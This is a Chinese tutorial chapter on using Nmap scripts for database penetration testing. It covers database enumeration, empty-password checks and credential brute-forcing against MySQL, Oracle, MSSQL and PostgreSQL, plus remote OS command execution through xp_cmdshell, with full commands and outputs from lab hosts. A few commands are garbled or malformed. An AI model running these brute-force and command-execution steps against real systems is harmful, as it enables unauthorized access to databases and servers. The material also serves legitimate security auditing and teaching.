第8章 数据库渗透测试

本章知识点

本章节将介绍Nmap脚本在数据库渗透方面的应用,Nmap脚本基本会涉及各个方面的应用,其对数据库的支持也是自然不会少的。通过本章学习,读者可以了解Nmap对数据库安全的作用。

本章脚本

表8.1所示为本章节所需Nmap命令表,为方便读者查阅,笔者特此整理。

表8.1 本章所需脚本选项(名称)

脚  本

解  释

mysql-databases

MySQL列举数据库

mysql-variables

列举MySQL变量

mysql-empty-password

检查MySQL密码

mysql-brute

审计MySQL密码

mysql-audit

审计MySQL安全配置

oracle-brute

审计Oracle密码

ms-sql-brute

审计msSQL密码

ms-sql-empty-password

检查msSQL空密码

ms-sql-tables

读取msSQL数据

ms-sql-xp-cmdshell

msSQL执行系统命令

pgsql-brute

审计PgSQL密码

表8.2所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——MySQL列举数据库。

表8.2 本节所需命令

脚  本

解  释

mysql-databases

MySQL列举数据库

mysql-variables

列举MySQL变量

mysql-empty-password

检查MySQL密码

mysql-brute

审计MySQL密码

mysql-audit

审计MySQL安全配置

oracle-brute

审计Oracle密码

ms-sql-brute

审计msSQL密码

ms-sql-empty-password

检查msSQL空密码

ms-sql-tables

读取msSQL数据

ms-sql-xp-cmdshell

msSQL执行系统命令

pgsql-brute

审计PgSQL密码

使用命令“nmap -p3306 --script mysql-databases --script-args mysqluser=root,mysqlpass 目标”进行Mysql数据库的列举工作。

root@Wing:~# nmap -p3306 --script mysql-databases --script-args mysqluser=root,mysqlpass 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org

 ) at 2014-06-12 20:20 CST
Nmap scan report for 192.168.84.1
Host is up (0.0016s latency).
PORT   STATE SERVICE
3306/tcp open mysql
| mysql
| test
| cmcc
|_ information_schema 

Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
root@Wing:~# 


如果我们已知目标MySQL的账号和密码,就可以轻易地夺取目标MySQL的所有数据库。如果目标数据库段端口更改了,我们也需要使用-p参数指定相应的数据库端口,使用mysqluser指定目标数据库账号,mysqlpass指定目标数据库密码,如果密码为空则不需填写任何东西,最后指向目标IP地址。

root@Wing:~# nmap -p3310 --script mysql-databases --script-args mysqluser=root,mysqlpass 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org

 ) at 2014-06-12 20:32 CST
Nmap scan report for 192.168.84.1
Host is up (0.0017s latency).
PORT   STATE SERVICE
3310/tcp open dyna-access
| mysql
| test
| cmcc
|_ information_schema 

Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
root@Wing:~# 


从以上结果来看,目标MySQL存在4个库,分别是mysql、test、cmcc、information_schema。我们也可以直接连接到目标数据库进行查看,但是这需要具备相应的环境才可以,直接使用Nmap的脚本是相当方便的,这不是Nmap独有的脚本,在Metasploit中也有相应的模块可以查看数据库。

 

在Nmap输入多行数据的时候,不需要用回车进行换行,Nmap会自动将多行数据进行换行处理。

表8.3所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——列举MySQL变量。

表8.3 本节所需命令

脚  本

解  释

mysql-databases

MySQL列举数据库

mysql-variables

列举MySQL变量

mysql-empty-password

检查MySQL密码

mysql-brute

审计MySQL密码

mysql-audit

审计MySQL安全配置

oracle-brute

审计Oracle密码

ms-sql-brute

审计msSQL密码

ms-sql-empty-password

检查msSQL空密码

ms-sql-tables

读取msSQL数据

ms-sql-xp-cmdshell

msSQL执行系统命令

pgsql-brute

审计PgSQL密码

使用命令“nmap -p3306 --script=mysql-variables目标”即可列举目标MySQL变量。

root@Wing:~# nmap -p3306 --script=mysql-variables 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org

 ) at 2014-06-12 20:39 CST
Nmap scan report for 192.168.84.1
Host is up (0.0016s latency).
PORT   STATE SERVICE
3306/tcp open mysql
| mysql-variables:
|  auto_increment_increment: 1
|  auto_increment_offset: 1
|  automatic_sp_privileges: ON
|  back_log: 50
|  basedir: /usr/
|  binlog_cache_size: 32768
|  bulk_insert_buffer_size: 8388608
|  character_set_client: latin1
|  character_set_connection: latin1
|  character_set_database: latin1
|  .
|  .
|  .
|  version_comment: (Debian)
|  version_compile_machine: powerpc
|  version_compile_os: debian-linux-gnu
|_ wait_timeout: 28800

Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
root@Wing:~# 


使用mysql-variables脚本可以轻易查询到MySQL数据库所有的变量。如果目标端口改变了则需要使用-p指定相应的端口。

root@Wing:~# nmap -p3310 --script=mysql-variables 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org

 ) at 2014-06-12 20:41 CST
Nmap scan report for 192.168.84.1
Host is up (0.0016s latency).
PORT   STATE SERVICE
3310/tcp open mysql
| mysql-variables:
|  auto_increment_increment: 1
|  auto_increment_offset: 1
|  automatic_sp_privileges: ON
|  back_log: 50
|  basedir: /usr/
|  binlog_cache_size: 32768
|  bulk_insert_buffer_size: 8388608
|  character_set_client: latin1
|  character_set_connection: latin1
|  character_set_database: latin1
|  .
|  .
|  .
|  version_comment: (Debian)
|  version_compile_machine: powerpc
|  version_compile_os: debian-linux-gnu
|_ wait_timeout: 28800

Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
root@Wing:~# 


如果仍无法确定可以使用-sV扫描端口。

root@Wing:~# nmap -sV --script=mysql-variables 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org

 ) at 2014-06-12 20:42 CST
Nmap scan report for 192.168.84.1
Host is up (1.0s latency).
Not shown: 979 closed ports
PORT   STATE  SERVICE      VERSION
80/tcp  open   http        Apache httpd 2.2.9 ((APMServ) mod_ssl/2.2.9 OpenSSL/ 0.9.8h PHP/5.2.6)
135/tcp  open   msrpc       Microsoft Windows RPC
139/tcp  open   netbios-ssn
443/tcp  open   ssl/http     Apache httpd 2.2.9 ((APMServ)mod_ssl/2.2.9 OpenSSL/ 0.9.8h PHP/5.2.6)
445/tcp  open   netbios-ssn
514/tcp  filtered shell
843/tcp  open   unknown
902/tcp  open   ssl/vmware-auth  VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
912/tcp  open   vmware-auth    VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
1025/tcp open   msrpc       Microsoft Windows RPC
1026/tcp open   msrpc       Microsoft Windows RPC
1027/tcp open   msrpc       Microsoft Windows RPC
1029/tcp open   msrpc       Microsoft Windows RPC
1037/tcp open   msrpc       Microsoft Windows RPC
1038/tcp open   msrpc       Microsoft Windows RPC
1169/tcp open   tripwire?
3306/tcp open   mysql       MySQL (unauthorized)
5678/tcp open   rrac?
7000/tcp open   afs3-fileserver?
8000/tcp open   tcpwrapped
10000/tcp open   snet-sensor-mgmt?
| mysql-variables:
|  auto_increment_increment: 1
|  auto_increment_offset: 1
|  automatic_sp_privileges: ON
|  back_log: 50
|  basedir: /usr/
|  binlog_cache_size: 32768
|  bulk_insert_buffer_size: 8388608
|  character_set_client: latin1
|  character_set_connection: latin1
|  character_set_database: latin1
|  .
|  .
|  .
|  version_comment: (Debian)
|  version_compile_machine: powerpc
|  version_compile_os: debian-linux-gnu
|_ wait_timeout: 28800

Service detection performed. Please report any incorrect results at http://nmap.org/submit/

 .
Nmap done: 1 IP address (1 host up) scanned in 298.43 seconds
root@Wing:~# 


如果使用-sV则需要花费较长的时间。

若需要设定目标的账号密码,需要加入mysql-brute或者mysql-empty-password选项指定账号密码。

表8.4所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——检查MySQL密码。

表8.4 本节所需命令

脚  本

解  释

mysql-databases

MySQL列举数据库

mysql-variables

列举MySQL变量

mysql-empty-password

检查MySQL密码

mysql-brute

审计MySQL密码

mysql-audit

审计MySQL安全配置

oracle-brute

审计Oracle密码

ms-sql-brute

审计msSQL密码

ms-sql-empty-password

检查msSQL空密码

ms-sql-tables

读取msSQL数据

ms-sql-xp-cmdshell

msSQL执行系统命令

pgsql-brute

审计PgSQL密码

使用命令“nmap -p3306 --script=mysql-empty-password目标”即可检查目标MySQL服务的密码。

root@Wing:~# nmap -p3306 --script=mysql-empty-password 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org

 ) at 2014-06-12 20:46 CST
Nmap scan report for 192.168.84.1
Host is up (0.0017s latency).
PORT   STATE SERVICE
3306/tcp open mysql
| mysql-empty-password:
|  anonymous account has empty password
|_ root account has empty password

Nmap done: 1 IP address (1 host up) scanned in 0.11 seconds
root@Wing:~# 


该脚本用于检查MySQL是否是空密码,或者密码是否为root,或允许匿名登录,是一个MySQL安全性的检查脚本,根据以上返回的结果可以得知目标MySQL数据库的密码为空,是可以任意进行登录并且没有限制的。

如果您无法确定目标开放的端口号,可以用-sV选项进行扫描。

root@Wing:~# nmap -sV --script=mysql-empty-password 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org

 ) at 2014-06-12 20:53 CST
Nmap scan report for 192.168.84.1
Host is up (1.0s latency).
Not shown: 979 closed ports
PORT   STATE  SERVICE       VERSION
80/tcp  open   http        Apache httpd 2.2.9 ((APMServ) mod_ssl/2.2.9 OpenSSL/ 0.9.8h PHP/5.2.6)
135/tcp  open   msrpc      Microsoft Windows RPC
139/tcp  open   netbios-ssn
443/tcp  open   ssl/http     Apache httpd 2.2.9 ((APMServ) mod_ssl/2.2.9 OpenSSL/ 0.9.8h PHP/5.2.6)
445/tcp  open   netbios-ssn
514/tcp  filtered shell
843/tcp  open   unknown
902/tcp  open   ssl/vmware-auth  VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
912/tcp  open   vmware-auth    VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
1025/tcp open   msrpc       Microsoft Windows RPC
1026/tcp open   msrpc       Microsoft Windows RPC
1027/tcp open   msrpc       Microsoft Windows RPC
1029/tcp open   msrpc       Microsoft Windows RPC
1037/tcp open   msrpc       Microsoft Windows RPC
1038/tcp open   msrpc       Microsoft Windows RPC
1169/tcp open   tripwire?
3306/tcp open   mysql       MySQL (unauthorized)
|_mysql-empty-password: Host 'pgos' is not allowed to connect to this MySQL server
5678/tcp open   rrac?
7000/tcp open   afs3-fileserver?
8000/tcp open   tcpwrapped
10000/tcp open   snet-sensor-mgmt?
| mysql-empty-password:
|  anonymous account has empty password
|_ root account has empty password

Service detection performed. Please report any incorrect results at http://nmap.org/submit/

 .
Nmap done: 1 IP address (1 host up) scanned in 296.45 seconds
root@Wing:~# 


如果知道端口号,可以使用-p选项指定。

 

一般情况下,我们会使用-F,-T4等选项快速地扫描目标端口,而不是直接使用-sV选项,直接使用-sV选项会跨越了信息搜集这一步。

表8.5所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——审计MySQL密码。

表8.5 本节所需命令

脚  本

解  释

mysql-databases

MySQL列举数据库

mysql-variables

列举MySQL变量

mysql-empty-password

检查MySQL密码

mysql-brute

审计MySQL密码

mysql-audit

审计MySQL安全配置

oracle-brute

审计Oracle密码

ms-sql-brute

审计msSQL密码

ms-sql-empty-password

检查msSQL空密码

ms-sql-tables

读取msSQL数据

ms-sql-xp-cmdshell

msSQL执行系统命令

pgsql-brute

审计PgSQL密码

使用命令“nmap --script=mysql-brute 目标”即可审计目标MySQL密码。

root@Wing:~# nmap --script=mysql-brute 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org

 ) at 2014-06-12 20:59 CST
Nmap scan report for 192.168.84.1
Host is up (1.0s latency).
Not shown: 979 closed ports
PORT   STATE  SERVICE
80/tcp  open   http
135/tcp  open   msrpc
139/tcp  open   netbios-ssn
443/tcp  open   https
445/tcp  open   microsoft-ds
514/tcp  filtered shell
843/tcp  open   unknown
902/tcp  open   iss-realsecure
912/tcp  open   apex-mesh
1025/tcp open   NFS-or-IIS
1026/tcp open   LSA-or-nterm
1027/tcp open   IIS
1029/tcp open   ms-lsa
1037/tcp open   ams
1038/tcp open   mtqp
1169/tcp open   tripwire
3306/tcp open   mysql
| mysql-brute:
|  Accounts
|   root:root - Valid credentials

5678/tcp open   rrac
7000/tcp open   afs3-fileserver
8000/tcp open   http-alt
10000/tcp open   snet-sensor-mgmt

Nmap done: 1 IP address (1 host up) scanned in 271.00 seconds
root@Wing:~# 


该脚本用于MySQL弱口令,默认Nmap会扫描全部的端口用于查找MySQL端口,但是我们可以使用-p选项指定一个端口,也可以自定义账号密码字典。

root@linux:/usr/share/nmap/scripts# nmap -p 3306 --script=mysql-brute userdb=/root/ passdb.txt passdb=/root/pass.txt 192.168.0.110


Starting Nmap 6.25 ( http://nmap.org

 ) at 2014-06-12 21:50 CST

Illegal netmask value, must be /0 - /32 . Assuming /32 (one host)

Failed to resolve given hostname/IP: userdb=. Note that you can't use '/mask' AND '1-4,7,100-' style IP ranges. If the machine only has an IPv6 address, add the Nmap -6 flag to scan that.



…省略…



3306/tcp open mysql

| mysql-brute:

|  Accounts

|   root:root - Valid credentials

Nmap done: 1 IP address (1 host up) scanned in 163.77 seconds


表8.6所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——审计MySQL安全配置。

表8.6 本节所需命令

脚  本

解  释

mysql-databases

MySQL列举数据库

mysql-variables

列举MySQL变量

mysql-empty-password

检查MySQL密码

mysql-brute

审计MySQL密码

mysql-audit

审计MySQL安全配置

oracle-brute

审计Oracle密码

ms-sql-brute

审计msSQL密码

ms-sql-empty-password

检查msSQL空密码

ms-sql-tables

读取msSQL数据

ms-sql-xp-cmdshell

msSQL执行系统命令

pgsql-brute

审计PgSQL密码

使用命令“nmap -p 3306 --script mysql-audit --script-args "mysql-audit.username='root', \ mysql- audit.password='',mysql-audit.filename='nselib/data/mysql-cis.audit'" 目标”即可审计MySQL安全配置。

root@Wing:~# nmap -p 3306 --script mysql-audit --script-args "mysql-audit.username= 'root',\mysql-audit.password='',mysql-audit.filename='nselib/data/mysql-cis.audit'" 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org

 ) at 2014-06-12 21:13 CST
Nmap scan report for 192.168.84.1
Host is up (0.0025s latency).
PORT   STATE SERVICE
3306/tcp open mysql
| mysql-audit:
|  CIS MySQL Benchmarks v1.0.2
|    3.1: Skip symbolic links => PASS
|    3.2: Logs not on system partition => PASS
|    3.2: Logs not on database partition => PASS
|    4.1: Supported version of MySQL => REVIEW
|     Version: 5.1.54-1ubuntu4
|    4.4: Remove test database => PASS
|    4.5: Change admin account name => FAIL
|    4.7: Verify Secure Password Hashes => PASS
|    4.9: Wildcards in user hostname => FAIL
|     The following users were found with wildcards in hostname
|      root
|      super
|      super2
|    4.10: No blank passwords => PASS
|    4.11: Anonymous account => PASS
|    5.1: Access to mysql database => REVIEW
|     Verify the following users that have access to the MySQL database
|      user       host
|      root       localhost
|      root       patrik-11
|      root       127.0.0.1
|      debian-sys-maint localhost
|      root       %
|      super       %
|    5.2: Do not grant FILE privileges to non Admin users => REVIEW
|     The following users were found having the FILE privilege
|      super
|      super2
|    5.3: Do not grant PROCESS privileges to non Admin users => REVIEW
|     The following users were found having the PROCESS privilege
|      super
|    5.4: Do not grant SUPER privileges to non Admin users => REVIEW
|     The following users were found having the SUPER privilege
|      super
|    5.5: Do not grant SHUTDOWN privileges to non Admin users => REVIEW
|     The following users were found having the SHUTDOWN privilege
|      super
|    5.6: Do not grant CREATE USER privileges to non Admin users => REVIEW
|     The following users were found having the CREATE USER privilege
|      super
|    5.7: Do not grant RELOAD privileges to non Admin users => REVIEW
|     The following users were found having the RELOAD privilege
|      super
|    5.8: Do not grant GRANT privileges to non Admin users => PASS
|    6.2: Disable Load data local => FAIL
|    6.3: Disable old password hashing => PASS
|    6.4: Safe show database => FAIL
|    6.5: Secure auth => FAIL
|    6.6: Grant tables => FAIL
|    6.7: Skip merge => FAIL
|    6.8: Skip networking => FAIL
|    6.9: Safe user create => FAIL
|    6.10: Skip symbolic links => FAIL
|
|_   The audit was performed using the db-account: root

Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds
root@Wing:~# 


mysql-audit脚本用于对MySQL安全配置进行审计,-p参数指定目标端口,如果无法确定目标端口可以使用-sV选项进行扫描,mysql-audit.username选项指定的是目标数据库的账号,mysql-audit.password选项指定的是目标的数据库密码,如果数据库密码为空,则在选项中留空。

表8.7所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——审计Oracle密码。

表8.7 本节所需命令

脚  本

解  释

mysql-databases

MySQL列举数据库

mysql-variables

列举MySQL变量

mysql-empty-password

检查MySQL密码

mysql-brute

审计MySQL密码

mysql-audit

审计MySQL安全配置

oracle-brute

审计Oracle密码

ms-sql-brute

审计msSQL密码

ms-sql-empty-password

检查msSQL空密码

ms-sql-tables

读取msSQL数据

ms-sql-xp-cmdshell

msSQL执行系统命令

pgsql-brute

审计PgSQL密码

使用命令“nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=test 目标”即可进行审计Oracle密码。

root@Wing:~# nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=test 192.168.126.131

Starting Nmap 6.40 ( http://nmap.org

 ) at 2014-06-12 21:29 CST
Nmap scan report for 192.168.126.131
Host is up (0.00032s latency).
PORT   STATE SERVICE REASON
1521/tcp open oracle syn-ack
| oracle-brute:
|  Accounts
|   system:powell => Account locked
|   haxxor:haxxor => Valid credentials
|  Statistics
|_  Perfomed 157 guesses in 8 seconds, average tps: 19

Nmap done: 1 IP address (1 host up) scanned in 263.39 seconds
root@Wing:~# 


oracle-brute脚本用于暴力破解Oracle密码,使用-p指向目标端口号。若需要自定义的账号密码字典进行暴力破解,需要userdb选项指定账号字典passdb指向密码字典。

root@Wing:~# nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=test --script-args
userdb=/tmp/usernames.txt,passdb=/tmp/passwords.txt 192.168.126.131

Starting Nmap 6.40 ( http://nmap.org

 ) at 2014-06-12 21:29 CST
Nmap scan report for 192.168.126.131
Host is up (0.00032s latency).
PORT   STATE SERVICE REASON
1521/tcp open oracle syn-ack
| oracle-brute:
|  Accounts
|   system:powell => Account locked
|   haxxor:haxxor => Valid credentials
|  Statistics
|_  Perfomed 157 guesses in 8 seconds, average tps: 19

Nmap done: 1 IP address (1 host up) scanned in 393.56 seconds
root@Wing:~# 


表8.8所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——审计msSQL密码。

表8.8 本节所需命令

脚  本

解  释

mysql-databases

MySQL列举数据库

mysql-variables

列举MySQL变量

mysql-empty-password

检查MySQL密码

mysql-brute

审计MySQL密码

mysql-audit

审计MySQL安全配置

oracle-brute

审计Oracle密码

ms-sql-brute

审计msSQL密码

ms-sql-empty-password

检查msSQL空密码

ms-sql-tables

读取msSQL数据

ms-sql-xp-cmdshell

msSQL执行系统命令

pgsql-brute

审计PgSQL密码

使用命令“nmap -p 1433 --script ms-sql-brute --script-args userdb=name.txt, passdb= pass.txt 目标”即可审计msSQL密码。

root@Wing:~# nmap -p 1433 --script ms-sql-brute --script-args userdb=name.txt, passdb=pass.txt 192.168.84.1

Starting Nmap 6.40 ( http://nmap.org

 ) at 2014-06-12 21:44 PDT
Nmap scan report for 192.168.84.1
Host is up (0.00021s latency).
PORT   STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-brute: 
|_ sa:123456 => Login Success

Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds

root@Wing:~#


表8.9所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——检查msSQL空密码。

表8.9 本节所需命令

脚  本

解  释

mysql-databases

MySQL列举数据库

mysql-variables

列举MySQL变量

mysql-empty-password

检查MySQL密码

mysql-brute

审计MySQL密码

mysql-audit

审计MySQL安全配置

oracle-brute

审计Oracle密码

ms-sql-brute

审计msSQL密码

ms-sql-empty-password

检查msSQL空密码

ms-sql-tables

读取msSQL数据

ms-sql-xp-cmdshell

msSQL执行系统命令

pgsql-brute

审计PgSQL密码

使用命令“nmap -p 1433 --script ms-sql-empty-password 目标”检查msSQL空密码。

root@Wing:~# nmap -p 1433 --script ms-sql-empty-password 192.168.126.1

Starting Nmap 6.40 ( http://nmap.org

 ) at 2014-06-12 22:03 CST
Nmap scan report for 192.168.126.1
Host is up (0.00027s latency).
PORT   STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-empty-password:
|  [192.168.126.1\PROD]
|_  sa:<empty> => Login Success

Nmap done: 1 IP address (1 host up) scanned in 231.16 seconds
root@Wing:~# 


使用ms-sql-empty-password脚本可以检查msSQL空密码,在上面的结果中可以得知目标主机的msSQL密码为空并且提示登录成功,脚本默认的账号为sa。

表8.10所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——读取msSQL数据。

表8.10 本节所需命令

脚  本

解  释

mysql-databases

MySQL列举数据库

mysql-variables

列举MySQL变量

mysql-empty-password

检查MySQL密码

mysql-brute

审计MySQL密码

mysql-audit

审计MySQL安全配置

oracle-brute

审计Oracle密码

ms-sql-brute

审计msSQL密码

ms-sql-empty-password

检查msSQL空密码

ms-sql-tables

读取msSQL数据

ms-sql-xp-cmdshell

msSQL执行系统命令

pgsql-brute

审计PgSQL密码

使用命令“nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql. Password=sa 目标”读取msSQL数据。

root@Wing:~# nmap –p 1433 –script ms-sql-tables –script-args mssql.username=sa, mssql.password=sa 192.168.126.131

Starting Nmap 6.40 ( http://nmap.org

 ) at 2014-06-12 21:51 PDT
Nmap scan report for 192.168.126.131
PORT   STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-tables: 
|  pen
|   table column   type length
|   ===== ======   ==== ======
|   products id   int  4
|   products prodName   varchar 50
|   users userId   int  4
|   users  sername varchar    50
|   users userPass  varchar    20
|  
|  Restrictions
|   Output restricted to 2 tables (see mssql-tables.maxtables)
|   Output restricted to 5 databases (see mssql-tables.maxdb)
|_  No filter (see mssql-tables.keywords)

Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
root@Wing:~# 


使用ms-sql-tables脚本就可以读取msSQL中的数据,其中,-p指定目标端口。分别用选项mssql.username、mssql.password指定账号密码。Nmap借助ms-sql-tables脚本可以轻易读取出相应的数据。

表8.11所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——msSQL执行系统命令。

表8.11 本节所需命令

脚  本

解  释

mysql-databases

MySQL列举数据库

mysql-variables

列举MySQL变量

mysql-empty-password

检查MySQL密码

mysql-brute

审计MySQL密码

mysql-audit

审计MySQL安全配置

oracle-brute

审计Oracle密码

ms-sql-brute

审计msSQL密码

ms-sql-empty-password

检查msSQL空密码

ms-sql-tables

读取msSQL数据

ms-sql-xp-cmdshell

msSQL执行系统命令

pgsql-brute

审计PgSQL密码

使用命令“nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql. password=sa,ms-sql-xp-cmdshell.cmd="ipconfig" 目标”即可借助msSQL执行系统命令。

root@Wing:~# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa, mssql.password=sa,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.126.1

Starting Nmap 6.40 ( http://nmap.org

 ) at 2014-06-12 21:55 PDT
Nmap scan report for 192.168.126.1
Host is up (0.00027s latency).
PORT   STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-xp-cmdshell: (Use --script-args=mssql-xp-cmdshell.cmd='<CMD>' to change command.)
|  ipconfig /all
|  output
|  ======
|  
|  Windows IP Configuration
|  
|   Host Name . . . . . . . . . . . . : wing
|   Primary Dns Suffix . . . . . . . : 
|   Node Type . . . . . . . . . . . . : Hybrid
|   IP Routing Enabled. . . . . . . . : No
|   WINS Proxy Enabled. . . . . . . . : No
|   DNS Suffix Search List. . . . . . : localdomain
|  
|  Ethernet adapter ,0\xDE\xA5:
|  
|   Connection-specific DNS Suffix . : localdomain
|   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
|   Physical Address. . . . . . . . . : 00-0D-29-06-18-F3
|   DHCP Enabled. . . . . . . . . . . : Yes
|   Autoconfiguration Enabled . . . . : Yes
|   IP Address. . . . . . . . . . . . : 192.168.126.1
|   Subnet Mask . . . . . . . . . . . : 255.255.255.0
|   Default Gateway . . . . . . . . . : 192.168.126.1
|   DHCP Server . . . . . . . . . . . : 192.168.126.2
|   DNS Servers . . . . . . . . . . . : 192.168.126.1
|   Primary WINS Server . . . . . . . : 192.168.126.1
|_ 

Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
root@Wing:~# 


借助ms-sql-xp-cmdshell脚本,当权限足够大的时候我们就可以执行相关的系统命令,甚至添加删除管理员账号都可以准确执行,如果您想执行这个命令需要确定目标服务器开放msSQL服务端口并且您知道链接的账号密码。

表8.12所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——审计PgSQL密码。

表8.12 本节所需命令

脚  本

解  释

mysql-databases

MySQL列举数据库

mysql-variables

列举MySQL变量

mysql-empty-password

检查MySQL密码

mysql-brute

审计MySQL密码

mysql-audit

审计MySQL安全配置

oracle-brute

审计Oracle密码

ms-sql-brute

审计msSQL密码

ms-sql-empty-password

检查msSQL空密码

ms-sql-tables

读取msSQL数据

ms-sql-xp-cmdshell

msSQL执行系统命令

pgsql-brute

审计PgSQL密码

使用命令“nmap -p 5432 --script pgsql-brute 目标”即可审计PgSQL密码。

root@Wing:~# nmap -p 5432 --script pgsql-brute 192.168.126.131

Starting Nmap 6.40 ( http://nmap.org

 ) at 2014-06-13 13:58 CST
Nmap scan report for 192.168.126.131
Host is up (0.00032s latency).
PORT  STATE SERVICE
5432/tcp open pgsql
| pgsql-brute:
|  root:<empty> => Valid credentials
|_ test:test => Valid credentials
MAC Address: 00:0C:29:E0:2E:76 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.20 seconds
root@Wing:~# 


pgsql-brute脚本是PgSQL数据库高效的密码审计工具,用于检查弱口令等。